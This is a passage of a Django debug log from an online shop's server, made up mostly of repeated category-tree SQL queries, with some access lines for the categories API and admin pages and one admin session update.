"shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 08:09:14,364 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 08:09:14,366 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 08:09:14,368 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 08:09:14,371 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 08:09:14,374 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 08:09:14,378 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 08:09:14,381 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 08:09:14,384 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 08:09:14,387 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 08:09:14,390 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 08:09:14,394 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 08:09:14,397 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 08:09:14,399 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 08:09:14,402 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 08:09:14,405 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 08:09:14,410 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 08:09:14,412 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 08:09:14,415 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 08:09:14,418 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 08:09:14,421 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 08:09:14,424 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 08:09:14,428 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 08:09:14,431 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 08:09:14,434 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 08:09:14,437 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 08:09:14,440 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 08:09:14] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 08:09:15] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [18/Dec/2019 08:09:15] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [18/Dec/2019 08:09:16] "GET /admin HTTP/1.0" 301 0 DEBUG 2019-12-18 08:09:16,814 utils 4252 140031747061504 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T08:09:16.804785+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 18, 8, 9, 16, 804785, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-18 08:09:16,816 utils 4252 140031747061504 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-18 08:09:16,846 utils 4252 140031747061504 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-18 08:09:16,854 utils 4252 140031747061504 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-01T08:09:16.853232+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 1, 8, 9, 16, 853232, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [18/Dec/2019 08:09:16] "GET /admin/ HTTP/1.0" 200 8208 [18/Dec/2019 08:09:17] "GET /static/admin/css/dashboard.css HTTP/1.0" 304 0 [18/Dec/2019 08:09:17] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 [18/Dec/2019 08:09:17] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [18/Dec/2019 08:09:17] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 [18/Dec/2019 08:09:18] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 304 0 [18/Dec/2019 08:09:18] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 304 0 [18/Dec/2019 08:09:18] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 304 0 [18/Dec/2019 08:09:18] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0 [18/Dec/2019 08:09:18] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0 DEBUG 2019-12-18 08:09:22,558 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 08:09:22,570 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 08:09:22,577 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 08:09:22,581 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 08:09:22,587 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 08:09:22,591 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 08:09:22,595 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 08:09:22,599 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 08:09:22,603 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 08:09:22,609 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 08:09:22,613 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 08:09:22,617 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 08:09:22,621 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 08:09:22,625 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 08:09:22,631 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 08:09:22,635 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 08:09:22,639 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 08:09:22,643 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 08:09:22,647 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 08:09:22,654 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 08:09:22,658 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 08:09:22,662 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 08:09:22,666 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 08:09:22,670 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 08:09:22,674 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 08:09:22,680 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 08:09:22,685 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 08:09:22,689 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 08:09:22,693 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 08:09:22,697 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 08:09:22,703 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 08:09:22,707 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 